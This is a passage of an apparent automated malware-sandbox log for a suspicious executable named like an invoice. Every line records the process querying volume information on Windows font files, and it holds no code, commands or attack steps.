Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
